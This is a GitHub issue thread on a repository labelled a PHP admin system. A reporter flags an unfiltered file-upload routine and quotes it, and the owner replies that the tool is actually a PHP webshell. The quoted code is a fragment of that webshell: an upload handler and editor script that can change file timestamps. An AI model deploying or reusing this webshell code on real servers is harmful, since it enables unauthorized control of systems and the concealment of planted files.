search

su18 / Stitch

PHP后台管理系统
174 stars 72 forks source link

File upload vulnerability #3

Open tianxiabingmadadudu opened 1 year ago

tianxiabingmadadudu commented 1 year ago

in the file stitch.php, on line number 1467. There is no file suffix filtering. You can upload PHP files. File upload vulnerability!

        $file_name = isset($_FILES['upfile']['name']) ? $_FILES['upfile']['name'] : "";
        $name      = isset($GLOBALS['_GET']['name']) ? Decrypt::run($GLOBALS['_GET']['name']) : "";

        $pp = urlencode(dirname($this->p));

        $result = <<<EOF
<script>
function utf16to8(str) {var out, i, len, c;out = "";len = str.length;for(i = 0; i < len; i++) {c = str.charCodeAt(i);if ((c >= 0x0001) && (c <= 0x007F)) {out += str.charAt(i);} else if (c > 0x07FF) {out += String.fromCharCode(0xE0 | ((c >> 12) & 0x0F));out += String.fromCharCode(0x80 | ((c >> 6) & 0x3F));out += String.fromCharCode(0x80 | ((c >> 0) & 0x3F));} else {out += String.fromCharCode(0xC0 | ((c >> 6) & 0x1F));out += String.fromCharCode(0x80 | ((c >> 0) & 0x3F));}}return out;}
function utf8to16(str) {var out, i, len, c;var char2, char3;out = "";len = str.length;i = 0;while(i < len) {c = str.charCodeAt(i++);switch(c >> 4) {case 0: case 1: case 2: case 3: case 4: case 5: case 6: case 7:out += str.charAt(i-1);break;case 12: case 13:char2 = str.charCodeAt(i++);out += String.fromCharCode(((c & 0x1F) << 6) | (char2 & 0x3F));break;case 14:char2 = str.charCodeAt(i++);char3 = str.charCodeAt(i++);out += String.fromCharCode(((c & 0x0F) << 12) |((char2 & 0x3F) << 6) |((char3 & 0x3F) << 0));break;}}return out;}
function CheckDate(){var re = document.getElementById('mtime').value;var reg = /^\d{1,4}-\d{1,2}-\d{1,2} \d{1,2}:\d{1,2}:\d{1,2}$/;var r = re.match(reg);var t = document.getElementById('charset').value;t = t.toLowerCase();if(r==null){alert('日期格式不正确!格式:yyyy-mm-dd hh:mm:ss');return false;}else{document.getElementById('newfile').value = base64encode(document.getElementById('newfile').value);if(t=="utf-8"){document.getElementById('txt').value = base64encode(utf16to8(document.getElementById('txt').value));}if(t=="gbk" || t=="gb2312"){document.getElementById('txt').value = base64encode(utf16to8(document.getElementById('txt').value));}}document.getElementById('editor').submit();}
</script>
EOF;
        if (!empty($GLOBALS['_POST']['upload'])) {
            $message_name = $file_name . ' ' . $this->msg[2];
            $content      = @copy($_FILES['upfile']['tmp_name'] , str_replace('//' , '/' , $this->p . '/' . $file_name)) ? $message_name : $this->msg[3];
            $url          = "?action=wjdc&path=" . base64_encode($this->p);
            HtmlOutput::tips($content , $url);
        }
su18 commented 1 year ago

兄弟,你看好了,我这是个 PHP 大马

Bronya-Rayi commented 1 year ago

笑死我了草,在大马下面找漏洞

1756816846 commented 1 year ago

年度笑话